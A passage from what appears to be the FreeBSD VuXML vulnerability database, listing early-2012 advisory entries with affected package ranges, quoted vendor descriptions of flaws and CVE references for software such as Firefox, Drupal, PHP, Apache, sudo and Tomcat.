<discovery>2012-02-13</discovery>
<entry>2012-02-14</entry>
<modified>2012-02-26</modified>
</dates>
</vuln>
<vuln vid="2b20fd5f-552e-11e1-9fb7-003067b2972c">
<topic>WebCalendar -- Persistent XSS</topic>
<affects>
<package>
<name>WebCalendar</name>
<range><le>1.2.4</le></range>
</package>
<package>
<name>WebCalendar-devel</name>
<range><le>1.2.4</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>tom reports,</p>
<blockquote cite="http://seclists.org/bugtraq/2012/Jan/128">
<p>There is no sanitization of the input of the location variable,
allowing for persistent XSS.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0846</cvename>
<url>http://sourceforge.net/tracker/?func=detail&amp;aid=3472745&amp;group_id=3870&amp;atid=103870</url>
</references>
<dates>
<discovery>2012-01-11</discovery>
<entry>2012-02-12</entry>
<modified>2012-02-13</modified>
</dates>
</vuln>
<vuln vid="eba9aa94-549c-11e1-b6b7-0011856a6e37">
<topic>mozilla -- use-after-free in nsXBLDocumentInfo::ReadPrototypeBindings</topic>
<affects>
<package>
<name>firefox</name>
<range><ge>10.0,1</ge><lt>10.0.1,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><ge>10.0,1</ge><lt>10.0.1,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><ge>2.7</ge><lt>2.7.1</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><ge>10.0</ge><lt>10.0.1</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><ge>2.7</ge><lt>2.7.1</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><ge>10.0</ge><lt>10.0.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-10 use after free in nsXBLDocumentInfo::ReadPrototypeBindings</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0452</cvename>
<url>https://www.mozilla.org/security/announce/2012/mfsa2012-10.html</url>
</references>
<dates>
<discovery>2012-02-10</discovery>
<entry>2012-02-11</entry>
</dates>
</vuln>
<vuln vid="1c4cab30-5468-11e1-9fb7-003067b2972c">
<topic>bip -- buffer overflow</topic>
<affects>
<package>
<name>bip</name>
<range><le>0.8.8</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Julien Tinnes reports,</p>
<blockquote cite="https://projects.duckcorp.org/issues/269">
<p>Bip doesn't check if fd is equal or larger than FD_SETSIZE.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0806</cvename>
<url>https://projects.duckcorp.org/projects/bip/repository/revisions/222a33cb84a2e52ad55a88900b7895bf9dd0262c</url>
<url>https://projects.duckcorp.org/issues/269</url>
</references>
<dates>
<discovery>2012-01-07</discovery>
<entry>2012-02-11</entry>
</dates>
</vuln>
<vuln vid="039d057e-544e-11e1-9fb7-003067b2972c">
<topic>surf -- private information disclosure</topic>
<affects>
<package>
<name>surf</name>
<range><le>0.4.1</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>surf does not protect its cookie jar against read access from
other local users.</p>
</body>
</description>
<references>
<cvename>CVE-2012-0842</cvename>
<url>http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=659296</url>
</references>
<dates>
<discovery>2012-02-10</discovery>
<entry>2012-02-11</entry>
</dates>
</vuln>
<vuln vid="7c769c89-53c2-11e1-8e52-00163e22ef61">
<topic>glpi -- remote attack via crafted POST request</topic>
<affects>
<package>
<name>glpi</name>
<range><lt>0.80.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The GLPI project reports:</p>
<blockquote cite="http://www.glpi-project.org/spip.php?page=annonce&amp;id_breve=237&amp;lang=en">
<p>The autocompletion functionality in GLPI before 0.80.2 does not
blacklist certain username and password fields, which allows
remote attackers to obtain sensitive information via a crafted
POST request.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.glpi-project.org/spip.php?page=annonce&amp;id_breve=237&amp;lang=en</url>
<url>https://forge.indepnet.net/issues/3017</url>
<cvename>CVE-2011-2720</cvename>
</references>
<dates>
<discovery>2011-07-20</discovery>
<entry>2012-02-10</entry>
<modified>2013-06-19</modified>
</dates>
</vuln>
<vuln vid="10720fe8-51e0-11e1-91c1-00215c6a37bb">
<topic>drupal -- multiple vulnerabilities</topic>
<affects>
<package>
<name>drupal6</name>
<range><lt>6.23</lt></range>
</package>
<package>
<name>drupal7</name>
<range><lt>7.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Drupal development team reports:</p>
<blockquote cite="http://drupal.org/node/1425084">
<h3>Cross Site Request Forgery vulnerability in Aggregator
module</h3>
<p>CVE: CVE-2012-0826</p>
<p>An XSRF vulnerability can force an aggregator feed to update.
Since some services are rate-limited (e.g. Twitter limits
requests to 150 per hour) this could lead to a denial of
service.</p>
<p>This issue affects Drupal 6.x and 7.x.</p>
<h3>OpenID not verifying signed attributes in SREG and AX</h3>
<p>CVE: CVE-2012-0825</p>
<p>A group of security researchers identified a flaw in how some
OpenID relying parties implement Attribute Exchange (AX). Not
verifying that attributes being passed through AX have been
signed could allow an attacker to modify users' information.</p>
<p>This issue affects Drupal 6.x and 7.x.</p>
<h3>Access bypass in File module</h3>
<p>CVE: CVE-2012-0827</p>
<p>When using private files in combination with certain field
access modules, the File module will allow users to download
the file even if they do not have access to view the field it
was attached to.</p>
<p>This issue affects Drupal 7.x only.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0825</cvename>
<cvename>CVE-2012-0826</cvename>
<cvename>CVE-2012-0827</cvename>
</references>
<dates>
<discovery>2012-02-01</discovery>
<entry>2012-02-07</entry>
</dates>
</vuln>
<vuln vid="309542b5-50b9-11e1-b0d8-00151735203a">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>2.4.*</ge><lt>3.6.8</lt></range>
<range><ge>4.0.*</ge><lt>4.0.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>A Bugzilla Security Advisory reports:</p>
<blockquote cite="http://www.bugzilla.org/security/3.4.12/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<ul>
<li>Account Impersonation:
When a user creates a new account, Bugzilla doesn't correctly
reject email addresses containing non-ASCII characters, which
could be used to impersonate another user account. Such email
addresses could look visually identical to other valid email
addresses, and an attacker could try to confuse other users
and be added to bugs he shouldn't have access to.</li>
<li>Cross-Site Request Forgery:
Due to a lack of validation of the Content-Type header when
making POST requests to jsonrpc.cgi, a possible CSRF
vulnerability was discovered. If a user visits an HTML page
with some malicious JS code in it, an attacker could make
changes to a remote Bugzilla installation on behalf of the
victim's account by using the JSON-RPC API. The user would
have had to be already logged in to the target site for the
vulnerability to work.</li>
</ul>
<p>All affected installations are encouraged to upgrade as soon as
possible.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0448</cvename>
<cvename>CVE-2012-0440</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=714472</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=718319</url>
</references>
<dates>
<discovery>2012-01-31</discovery>
<entry>2012-02-06</entry>
</dates>
</vuln>
<vuln vid="3fd040be-4f0b-11e1-9e32-0025900931f8">
<topic>php -- arbitrary remote code execution vulnerability</topic>
<affects>
<package>
<name>php5</name>
<range><ge>5.3.9</ge><lt>5.3.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia reports:</p>
<blockquote cite="http://secunia.com/advisories/47806/">
<p>A vulnerability has been reported in PHP, which can be exploited
by malicious people to compromise a vulnerable system.</p>
<p>The vulnerability is caused due to a logic error within the
"php_register_variable_ex()" function (php_variables.c) when
hashing form posts and updating a hash table, which can be
exploited to execute arbitrary code.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0830</cvename>
<url>http://www.php.net/archive/2012.php#id2012-02-02-1</url>
<url>http://secunia.com/advisories/47806/</url>
</references>
<dates>
<discovery>2012-02-02</discovery>
<entry>2012-02-04</entry>
<modified>2012-02-06</modified>
</dates>
</vuln>
<vuln vid="6e7ad1d7-4e27-11e1-8e12-90e6ba8a36a2">
<topic>mathopd -- directory traversal vulnerability</topic>
<affects>
<package>
<name>mathopd</name>
<range><lt>1.5p7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Michiel Boland reports:</p>
<blockquote cite="http://www.mathopd.org/security.html">
<p>The software has a vulnerability that could lead to directory
traversal if the '*' construct for mass virtual hosting is
used.</p>
</blockquote>
</body>
</description>
<references>
<mlist msgid="4F2AFEF2.5040708@boland.org">http://www.mail-archive.com/mathopd%40mathopd.org/msg00392.html</mlist>
<url>http://www.mathopd.org/security.html</url>
</references>
<dates>
<discovery>2012-02-02</discovery>
<entry>2012-02-03</entry>
</dates>
</vuln>
<vuln vid="4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0">
<topic>apache -- multiple vulnerabilities</topic>
<affects>
<package>
<name>apache</name>
<range><gt>2.*</gt><lt>2.2.22</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>CVE MITRE reports:</p>
<blockquote cite="http://httpd.apache.org/security/vulnerabilities_22.html">
<p>An exposure was found when using mod_proxy in reverse proxy
mode. In certain configurations using RewriteRule with proxy
flag or ProxyPassMatch, a remote attacker could cause the reverse
proxy to connect to an arbitrary server, possibly disclosing
sensitive information from internal web servers not directly
accessible to attacker.</p>
<p>Integer overflow in the ap_pregsub function in server/util.c in
the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through
2.2.21, when the mod_setenvif module is enabled, allows local
users to gain privileges via a .htaccess file with a crafted
SetEnvIf directive, in conjunction with a crafted HTTP request
header, leading to a heap-based buffer overflow.</p>
<p>An additional exposure was found when using mod_proxy in
reverse proxy mode. In certain configurations using RewriteRule
with proxy flag or ProxyPassMatch, a remote attacker could cause
the reverse proxy to connect to an arbitrary server, possibly
disclosing sensitive information from internal web servers
not directly accessible to attacker.</p>
<p>A flaw was found in mod_log_config. If the '%{cookiename}C' log
format string is in use, a remote attacker could send a specific
cookie causing a crash. This crash would only be a denial of
service if using a threaded MPM.</p>
<p>A flaw was found in the handling of the scoreboard. An
unprivileged child process could cause the parent process to
crash at shutdown rather than terminate cleanly.</p>
<p>A flaw was found in the default error response for status code
400. This flaw could be used by an attacker to expose
"httpOnly" cookies when no custom ErrorDocument is specified.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3368</cvename>
<cvename>CVE-2011-3607</cvename>
<cvename>CVE-2011-4317</cvename>
<cvename>CVE-2012-0021</cvename>
<cvename>CVE-2012-0031</cvename>
<cvename>CVE-2012-0053</cvename>
</references>
<dates>
<discovery>2011-10-05</discovery>
<entry>2012-01-31</entry>
</dates>
</vuln>
<vuln vid="0a9e2b72-4cb7-11e1-9146-14dae9ebcf89">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>4.0,1</gt><lt>10.0,1</lt></range>
<range><ge>3.6.*,1</ge><lt>3.6.26</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.7</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.7</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>4.0</gt><lt>10.0</lt></range>
<range><gt>3.1.*</gt><lt>3.1.18</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-01 Miscellaneous memory safety hazards (rv:10.0/
rv:1.9.2.26)</p>
<p>MFSA 2012-02 Overly permissive IPv6 literal syntax</p>
<p>MFSA 2012-03 iframe element exposed across domains via name
attribute</p>
<p>MFSA 2012-04 Child nodes from nsDOMAttribute still accessible
after removal of nodes</p>
<p>MFSA 2012-05 Frame scripts calling into untrusted objects bypass
security checks</p>
<p>MFSA 2012-06 Uninitialized memory appended when encoding icon
images may cause information disclosure</p>
<p>MFSA 2012-07 Potential Memory Corruption When Decoding Ogg Vorbis
files</p>
<p>MFSA 2012-08 Crash with malformed embedded XSLT stylesheets</p>
<p>MFSA 2012-09 Firefox Recovery Key.html is saved with unsafe
permission</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0442</cvename>
<cvename>CVE-2012-0443</cvename>
<cvename>CVE-2011-3670</cvename>
<cvename>CVE-2012-0445</cvename>
<cvename>CVE-2011-3659</cvename>
<cvename>CVE-2012-0446</cvename>
<cvename>CVE-2012-0447</cvename>
<cvename>CVE-2012-0449</cvename>
<cvename>CVE-2012-0450</cvename>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-01.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-02.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-03.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-04.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-05.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-06.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-07.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-08.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-09.html</url>
</references>
<dates>
<discovery>2012-01-31</discovery>
<entry>2012-02-01</entry>
<modified>2012-03-18</modified>
</dates>
</vuln>
<vuln vid="7c920bb7-4b5f-11e1-9f47-00e0815b8da8">
<topic>sudo -- format string vulnerability</topic>
<affects>
<package>
<name>sudo</name>
<range><ge>1.8.0</ge><lt>1.8.3_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Todd Miller reports:</p>
<blockquote cite="http://www.gratisoft.us/sudo/alerts/sudo_debug.html">
<p>Sudo 1.8.0 introduced simple debugging support that was primarily
intended for use when developing policy or I/O logging plugins.
The sudo_debug() function contains a flaw where the program name
is used as part of the format string passed to the fprintf()
function. The program name can be controlled by the caller,
either via a symbolic link or, on some systems, by setting argv[0]
when executing sudo.</p>
<p>Using standard format string vulnerability exploitation
techniques it is possible to leverage this bug to achieve root
privileges.</p>
<p>Exploitation of the bug does not require that the attacker be
listed in the sudoers file. As such, we strongly suggest that
affected sites upgrade from affected sudo versions as soon as
possible.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0809</cvename>
<url>http://www.gratisoft.us/sudo/alerts/sudo_debug.html</url>
</references>
<dates>
<discovery>2012-01-30</discovery>
<entry>2012-01-30</entry>
<modified>2012-01-31</modified>
</dates>
</vuln>
<vuln vid="e51d5b1a-4638-11e1-9f47-00e0815b8da8">
<topic>FreeBSD -- pam_ssh() does not validate service names</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.3</ge><lt>7.3_9</lt></range>
<range><ge>7.4</ge><lt>7.4_5</lt></range>
<range><ge>8.1</ge><lt>8.1_7</lt></range>
<range><ge>8.2</ge><lt>8.2_5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-11:10.pam.asc">
<h1>Problem Description:</h1>
<p>Some third-party applications, including KDE's kcheckpass command,
allow the user to specify the name of the policy on the command
line. Since OpenPAM treats the policy name as a path relative to
/etc/pam.d or /usr/local/etc/pam.d, users who are permitted to run
such an application can craft their own policies and cause the
application to load and execute their own modules.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-11:10.pam</freebsdsa>
<cvename>CVE-2011-4122</cvename>
</references>
<dates>
<discovery>2011-12-23</discovery>
<entry>2012-01-29</entry>
</dates>
</vuln>
<vuln vid="eda151d8-4638-11e1-9f47-00e0815b8da8">
<topic>FreeBSD -- pam_ssh improperly grants access when user account has unencrypted SSH private keys</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.3</ge><lt>7.3_9</lt></range>
<range><ge>7.4</ge><lt>7.4_5</lt></range>
<range><ge>8.1</ge><lt>8.1_7</lt></range>
<range><ge>8.2</ge><lt>8.2_5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-11:09.pam_ssh.asc">
<h1>Problem Description:</h1>
<p>The OpenSSL library call used to decrypt private keys ignores the
passphrase argument if the key is not encrypted. Because the
pam_ssh module only checks whether the passphrase provided by the
user is null, users with unencrypted SSH private keys may
successfully authenticate themselves by providing a dummy
passphrase.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-11:09.pam_ssh</freebsdsa>
</references>
<dates>
<discovery>2011-12-23</discovery>
<entry>2012-01-29</entry>
<modified>2013-06-18</modified>
</dates>
</vuln>
<vuln vid="f56390a4-4638-11e1-9f47-00e0815b8da8">
<topic>FreeBSD -- Buffer overflow in handling of UNIX socket addresses</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.3</ge><lt>7.3_8</lt></range>
<range><ge>7.4</ge><lt>7.4_4</lt></range>
<range><ge>8.1</ge><lt>8.1_6</lt></range>
<range><ge>8.2</ge><lt>8.2_4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-11:05.unix.asc">
<h1>Problem Description:</h1>
<p>When a UNIX-domain socket is attached to a location using the
bind(2) system call, the length of the provided path is not
validated. Later, when this address is returned via other system
calls, it is copied into a fixed-length buffer.</p>
<p>Linux uses a larger socket address structure for UNIX-domain
sockets than FreeBSD, and FreeBSD's Linux emulation code did
not translate UNIX-domain socket addresses into the correct size
of structure.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-11:05.unix</freebsdsa>
</references>
<dates>
<discovery>2011-09-28</discovery>
<entry>2012-01-29</entry>
</dates>
</vuln>
<vuln vid="fee94342-4638-11e1-9f47-00e0815b8da8">
<topic>FreeBSD -- errors handling corrupt compress file in compress(1) and gzip(1)</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.3</ge><lt>7.3_7</lt></range>
<range><ge>7.4</ge><lt>7.4_3</lt></range>
<range><ge>8.1</ge><lt>8.1_5</lt></range>
<range><ge>8.2</ge><lt>8.2_3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-11:04.compress.asc">
<h1>Problem Description:</h1>
<p>The code used to decompress a file created by compress(1) does not
do sufficient boundary checks on compressed code words, allowing
reference beyond the decompression table, which may result in a
stack overflow or an infinite loop when the decompressor encounters
a corrupted file.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-11:04.compress</freebsdsa>
<cvename>CVE-2011-2895</cvename>
</references>
<dates>
<discovery>2011-09-28</discovery>
<entry>2012-01-29</entry>
</dates>
</vuln>
<vuln vid="87261557-a450-11e2-9898-001060e06fd4">
<topic>FreeBSD -- Network ACL mishandling in mountd(8)</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.3</ge><lt>7.3_5</lt></range>
<range><ge>7.4</ge><lt>7.4_1</lt></range>
<range><ge>8.1</ge><lt>8.1_3</lt></range>
<range><ge>8.2</ge><lt>8.2_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-11:01.mountd.asc">
<h1>Problem Description:</h1>
<p>While parsing the exports(5) table, a network mask in the form of
"-network=netname/prefixlength" results in an incorrect network mask
being computed if the prefix length is not a multiple of 8.</p>
<p>For example, specifying the ACL for an export as "-network
192.0.2.0/23" would result in a netmask of 255.255.127.0 being used
instead of the correct netmask of 255.255.254.0.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-11:01.mountd</freebsdsa>
<cvename>CVE-2011-1739</cvename>
</references>
<dates>
<discovery>2011-04-20</discovery>
<entry>2012-01-29</entry>
</dates>
</vuln>
<vuln vid="93688f8f-4935-11e1-89b4-001ec9578670">
<topic>postfixadmin -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>postfixadmin</name>
<range><lt>2.3.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Postfix Admin Team reports:</p>
<blockquote cite="http://sourceforge.net/projects/postfixadmin/forums/forum/676076/topic/4977778">
<p>Multiple XSS vulnerabilities exist:</p>
<ul>
<li>XSS with $_GET[domain] in templates/menu.php and
edit-vacation</li>
<li>XSS in some create-domain input fields</li>
<li>XSS in create-alias and edit-alias error message</li>
<li>XSS (by values stored in the database) in fetchmail list
view, list-domain and list-virtual</li>
</ul>
<p>Multiple SQL injection issues exist:</p>
<ul>
<li>SQL injection in pacrypt() (if $CONF[encrypt] ==
'mysql_encrypt')</li>
<li>SQL injection in backup.php - the dump was not mysql_escape()d,
therefore users could inject SQL (for example in the vacation message)
which will be executed when restoring the database dump.
WARNING: database dumps created with backup.php from 2.3.4 or older
might contain malicious SQL. Double-check before using them!</li>
</ul>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0811</cvename>
<cvename>CVE-2012-0812</cvename>
<url>http://sourceforge.net/projects/postfixadmin/forums/forum/676076/topic/4977778</url>
</references>
<dates>
<discovery>2012-01-27</discovery>
<entry>2012-01-27</entry>
</dates>
</vuln>
<vuln vid="e465159c-4817-11e1-89b4-001ec9578670">
<topic>mpack -- Information disclosure</topic>
<affects>
<package>
<name>mpack</name>
<range><lt>1.6_3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The oss-security list reports:</p>
<blockquote cite="http://openwall.com/lists/oss-security/2011/12/31/1">
<p>Incorrect permissions on temporary files can lead to
information disclosure.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4919</cvename>
<url>http://openwall.com/lists/oss-security/2011/12/31/1</url>
</references>
<dates>
<discovery>2011-12-31</discovery>
<entry>2012-01-26</entry>
</dates>
</vuln>
<vuln vid="fa2f386f-4814-11e1-89b4-001ec9578670">
<topic>acroread9 -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>acroread9</name>
<range><lt>9.4.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Adobe Security Team reports:</p>
<blockquote cite="http://www.adobe.com/support/security/advisories/apsa11-04.html">
<p>An unspecified vulnerability in the U3D component allows
remote attackers to execute arbitrary code (or cause a denial
of service attack) via unknown vectors.</p>
</blockquote>
<blockquote cite="http://www.adobe.com/support/security/bulletins/apsb11-24.html">
<p>A heap-based buffer overflow allows attackers to execute
arbitrary code via unspecified vectors.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-2462</cvename>
<cvename>CVE-2011-1353</cvename>
<cvename>CVE-2011-2431</cvename>
<cvename>CVE-2011-2432</cvename>
<cvename>CVE-2011-2433</cvename>
<cvename>CVE-2011-2434</cvename>
<cvename>CVE-2011-2435</cvename>
<cvename>CVE-2011-2436</cvename>
<cvename>CVE-2011-2437</cvename>
<cvename>CVE-2011-2438</cvename>
<cvename>CVE-2011-2439</cvename>
<cvename>CVE-2011-2440</cvename>
<cvename>CVE-2011-2441</cvename>
<cvename>CVE-2011-2442</cvename>
<url>http://www.adobe.com/support/security/bulletins/apsb11-24.html</url>
<url>http://www.adobe.com/support/security/advisories/apsa11-04.html</url>
</references>
<dates>
<discovery>2011-12-07</discovery>
<entry>2012-01-26</entry>
</dates>
</vuln>
<vuln vid="3ebb2dc8-4609-11e1-9f47-00e0815b8da8">
<topic>Wireshark -- Multiple vulnerabilities</topic>
<affects>
<package>
<name>wireshark</name>
<range><ge>1.4</ge><lt>1.4.11</lt></range>
<range><ge>1.6.0</ge><lt>1.6.5</lt></range>
</package>
<package>
<name>wireshark-lite</name>
<range><ge>1.4</ge><lt>1.4.11</lt></range>
<range><ge>1.6.0</ge><lt>1.6.5</lt></range>
</package>
<package>
<name>tshark</name>
<range><ge>1.4</ge><lt>1.4.11</lt></range>
<range><ge>1.6.0</ge><lt>1.6.5</lt></range>
</package>
<package>
<name>tshark-lite</name>
<range><ge>1.4</ge><lt>1.4.11</lt></range>
<range><ge>1.6.0</ge><lt>1.6.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Wireshark reports:</p>
<blockquote cite="http://www.wireshark.org/docs/relnotes/wireshark-1.6.5.html">
<p>Laurent Butti discovered that Wireshark failed to properly check
record sizes for many packet capture file formats.</p>
<p>Wireshark could dereference a NULL pointer and crash.</p>
<p>The RLC dissector could overflow a buffer.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0041</cvename>
<cvename>CVE-2012-0066</cvename>
<cvename>CVE-2012-0067</cvename>
<cvename>CVE-2012-0068</cvename>
<url>http://www.wireshark.org/security/wnpa-sec-2012-01.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-02.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-03.html</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6663</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6666</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6667</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6668</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6669</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6670</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6634</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6391</url>
</references>
<dates>
<discovery>2010-01-10</discovery>
<entry>2012-01-23</entry>
</dates>
</vuln>
<vuln vid="7d2336c2-4607-11e1-9f47-00e0815b8da8">
<topic>spamdyke -- Buffer Overflow Vulnerabilities</topic>
<affects>
<package>
<name>spamdyke</name>
<range><lt>4.3.0</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia reports:</p>
<blockquote cite="http://www.spamdyke.org/documentation/Changelog.txt">
<p>Fixed a number of very serious errors in the usage of
snprintf()/vsnprintf().</p>
<p>The return value was being used as the length of the string
printed into the buffer, but the return value really indicates
the length of the string that *could* be printed if the buffer
were of infinite size. Because the returned value could be
larger than the buffer's size, this meant remotely exploitable
buffer overflows were possible, depending on spamdyke's
configuration.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0802</cvename>
<url>https://secunia.com/advisories/47548/</url>
<url>http://www.spamdyke.org/documentation/Changelog.txt</url>
</references>
<dates>
<discovery>2012-01-15</discovery>
<entry>2012-01-23</entry>
</dates>
</vuln>
<vuln vid="5c5f19ce-43af-11e1-89b4-001ec9578670">
<topic>OpenSSL -- DTLS Denial of Service</topic>
<affects>
<package>
<name>openssl</name>
<range><lt>1.0.0_9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The OpenSSL Team reports:</p>
<blockquote cite="http://www.openssl.org/news/secadv_20120118.txt">
<p>A flaw in the fix to CVE-2011-4108 can be exploited in a
denial of service attack. Only DTLS applications using OpenSSL
1.0.0f and 0.9.8s are affected.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0050</cvename>
<url>http://www.openssl.org/news/secadv_20120118.txt</url>
</references>
<dates>
<discovery>2012-01-18</discovery>
<entry>2012-01-20</entry>
</dates>
</vuln>
<vuln vid="dd698b76-42f7-11e1-a1b6-14dae9ebcf89">
<topic>asterisk -- SRTP Video Remote Crash Vulnerability</topic>
<affects>
<package>
<name>asterisk18</name>
<range><lt>1.8.8.2</lt></range>
</package>
<package>
<name>asterisk10</name>
<range><lt>10.0.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="http://downloads.asterisk.org/pub/security/AST-2012-001.html">
<p>An attacker attempting to negotiate a secure video stream can
crash Asterisk if video support has not been enabled and the
res_srtp Asterisk module is loaded.</p>
</blockquote>
</body>
</description>
<references>
<url>http://downloads.asterisk.org/pub/security/AST-2012-001.html</url>
</references>
<dates>
<discovery>2012-01-15</discovery>
<entry>2012-01-20</entry>
<modified>2013-06-19</modified>
</dates>
</vuln>
<vuln vid="7f5ccb1d-439b-11e1-bc16-0023ae8e59f0">
<topic>tomcat -- Denial of Service</topic>
<affects>
<package>
<name>tomcat</name>
<range><gt>5.5.0</gt><lt>5.5.35</lt></range>
</package>
<package>
<name>tomcat</name>
<range><gt>6.0.0</gt><lt>6.0.34</lt></range>
</package>
<package>
<name>tomcat</name>
<range><gt>7.0.0</gt><lt>7.0.23</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Tomcat security team reports:</p>
<blockquote cite="http://tomcat.apache.org/security-5.html#Fixed_in_Apache_Tomcat_5.5.35">
<p>Analysis of the recent hash collision vulnerability identified
unrelated inefficiencies with Apache Tomcat's handling of large
numbers of parameters and parameter values. These inefficiencies
could allow an attacker, via a specially crafted request, to
cause large amounts of CPU to be used which in turn could create
a denial of service. The issue was addressed by modifying the
Tomcat parameter handling code to efficiently process large
